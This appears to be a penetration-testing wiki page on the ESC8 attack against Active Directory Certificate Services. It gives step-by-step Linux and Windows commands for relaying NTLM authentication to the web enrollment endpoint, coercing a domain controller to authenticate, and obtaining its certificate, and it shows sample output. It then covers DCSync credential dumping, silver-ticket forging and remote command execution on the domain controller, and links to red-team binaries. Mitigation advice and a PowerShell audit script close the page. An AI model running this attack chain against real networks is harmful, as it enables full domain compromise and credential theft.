ESC8
Description
ESC8 attacks fall under the category of NTLM relay attacks. Active Directory Certificate Services (AD CS) supports multiple enrollment methods, including HTTP-based enrollment, which enables users to request and obtain certificates over HTTP. The core concept of ESC8 abuse involves coercing authentication from a machine account and relaying it to AD CS to acquire a certificate that permits client authentication.
Since the HTTP protocol does not enforce NTLM signature verification during authentication, if the HTTP enrollment endpoint is enabled, an attacker can obtain NTLM authentication (through techniques like authentication coercion or poisoning), relay it to the AD CS HTTP endpoint, and request a certificate for the authenticated account.
Requirements for attack path
vulnerable web enrollment endpoint
at least one certificate template that is enabled and allows domain computer enrollment and client authentication
Linux
Enumeration
certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -stdout -vulnerable

Performing the attack
After identifying a vulnerable web enrollment endpoint, the next step is to set up the NTLM relay. Either ntlmrelayx or certipy can be used.
# Certipy, target is the ADCS server
certipy relay -target 10.10.10.2 -template DomainController
# ntlmrelayx, target is the ADCS server
impacket-ntlmrelayx -t http://10.10.10.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Once either of the relay listeners is running, we can use Coercer to perform forced authentication.
coercer coerce -l 10.10.10.4 -t 10.10.10.2 -d security.local -u moe -p Password123 --always-continue
Once coercion succeeds, both certipy and ntlmrelayx save the certificate file to the current directory.
[*] Targeting http://10.10.10.2/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Requesting certificate for 'SECURITY\\DC01$' based on the template 'DomainController'
[*] Got certificate with DNS Host Name 'DC01.SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1000'
[*] Saved certificate and private key to 'dc01.pfx'
Then use certipy to authenticate with the saved certificate and obtain credentials.
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.100
Post Exploitation
Various post-exploitation steps can be undertaken after obtaining a machine account hash. The example below focuses on post-exploitation with a Domain Controller hash.
DCSync
A simple approach would be to perform a DCSync with impacket-secretsdump using the domain controller hash obtained from the certificate.
# All data
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d
# Single user
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d -just-dc-user krbtgt
Silver Ticket
As an alternative option we can generate a silver ticket for a particular service such as CIFS and then gain direct command execution over the target, in this case the Domain Controller.
Firstly, identify the domain SID.
impacket-lookupsid 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d | grep 'Domain SID is:'
Next, we use ticketer to forge a silver ticket for a given service, in this case CIFS on the Domain Controller.
impacket-ticketer -nthash 1fe859c38adaa592ad52559fd9ab584d -domain-sid S-1-5-21-13999771-2333344039-1820745628 -domain security.local -spn cifs/dc01.security.local Administrator
Then export the TGS.
export KRB5CCNAME=Administrator.ccache
Finally, authenticate and issue commands.
nxc smb dc01.security.local --use-kcache -x 'whoami'

Windows
Local administrator rights are required on Windows to perform this attack as SMB traffic needs to be redirected to a non-default port.
Enumeration
Certify does not identify web enrollment endpoints as such; some manual identification is needed. Browse to the Web Enrollment page for the Certificate Authority.
http://ca.security.local/certsrv/certfnsh.asp
If we connect over HTTP and see an authentication form such as that shown below, the endpoint is likely vulnerable to ESC8.

Performing the attack
NTLMrelayx.exe
https://github.com/The-Viper-One/RedTeam-Binaries/blob/main/ntlmrelayx.exe
DivertTCPconn
https://github.com/Arno0x/DivertTCPconn/tree/master/compiled_binaries/Binaries_x64
SharpEFSTrigger
https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Coercion/SharpEfsTrigger.exe
Usage
Configure DivertTCPconn to redirect SMB traffic to port 8445 (Requires Local Admin)
.\divertTCPConn.exe 445 8445
Set up NTLMRelayx and target the Certificate Authority web enrollment endpoint, ensuring --smb-port 8445 is specified.
.\ntlmrelayx.exe --smb-port 8445 -t http://ca.security.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Coerce a Domain Controller to authenticate to the testing host in order to capture a certificate for the Domain Controller.
.\SharpEfsTrigger.exe [Target] [Listening-Host] [API Call]
.\SharpEfsTrigger.exe 10.10.10.100 10.10.10.3 EfsRpcEncryptFileSrv
This should capture the certificate of the Domain Controller, provided the coercion is successful.

Post Exploitation
DCSync
A simple approach would be to perform a DCSync with PsMapExec using the domain controller TGT obtained from the certificate.
PsMapExec -targets 'dc01' -domain 'security.local' -method 'dcsync' -showoutput -ticket 'doIGRjCCBkKgAwIBBaEDAgEWooI....'

Mitigation
Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment.
Disable NTLM on any AD CS servers in your domain using the group policy setting Network security: Restrict NTLM: Incoming NTLM traffic. To configure it, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options, and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts. If needed, add exceptions using the setting Network security: Restrict NTLM: Add server exceptions in this domain.
Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.
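As an added audit example for the mitigations above (not from the original page or any tool it references), the following PowerShell checks an AD CS server's CertSrv IIS configuration for the conditions ESC8 depends on: NTLM accepted over plain HTTP without EPA, and incoming NTLM not restricted by policy. The site name is an assumption; since EPA only protects HTTPS connections, the HTTP binding is checked as well.

```powershell
# Added audit script (not from the original page or any referenced tool).
# Run locally on an AD CS server hosting Certificate Authority Web Enrollment.
# It reports the conditions ESC8 relies on: NTLM accepted by the CertSrv IIS
# application over plain HTTP without Extended Protection for Authentication,
# and incoming NTLM not restricted by policy.
Import-Module WebAdministration

$site = 'Default Web Site'   # assumption: CertSrv is installed under the default site
$app  = "IIS:\Sites\$site\CertSrv"
$findings = @()

# 1. Plain HTTP binding: EPA only protects HTTPS, so an HTTP binding leaves the relay path open.
if (Get-WebBinding -Name $site -Protocol 'http') {
    $findings += 'Site still has an HTTP binding; remove it or redirect to HTTPS'
}

# 2. Does the CertSrv application require SSL? (sslFlags should contain 'Ssl')
$access = Get-WebConfiguration -PSPath $app -Filter 'system.webServer/security/access'
if ("$($access.sslFlags)" -notmatch 'Ssl') {
    $findings += "CertSrv does not require SSL (sslFlags = '$($access.sslFlags)')"
}

# 3. Extended Protection for Authentication on Windows authentication (first mitigation above)
$epa = Get-WebConfiguration -PSPath $app `
    -Filter 'system.webServer/security/authentication/windowsAuthentication/extendedProtection'
if ("$($epa.tokenChecking)" -ne 'Require') {
    $findings += "EPA tokenChecking is '$($epa.tokenChecking)'; set it to Require"
}

# 4. NTLM offered explicitly as a provider (Negotiate can still fall back to NTLM,
#    which is why the policy check below matters as well)
$providers = Get-WebConfiguration -PSPath $app `
    -Filter 'system.webServer/security/authentication/windowsAuthentication/providers/add'
if ($providers | Where-Object { $_.value -eq 'NTLM' }) {
    $findings += 'NTLM is listed as a Windows authentication provider for CertSrv'
}

# 5. Restrict NTLM: Incoming NTLM traffic (0 = allow all, 1 = deny domain accounts, 2 = deny all)
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
if (-not $lsa.RestrictReceivingNTLMTraffic) {
    $findings += 'RestrictReceivingNTLMTraffic is unset or 0: incoming NTLM is allowed'
}

if ($findings) { $findings | ForEach-Object { Write-Output "[!] $_" } }
else           { Write-Output '[+] CertSrv configuration shows no ESC8 exposure' }
```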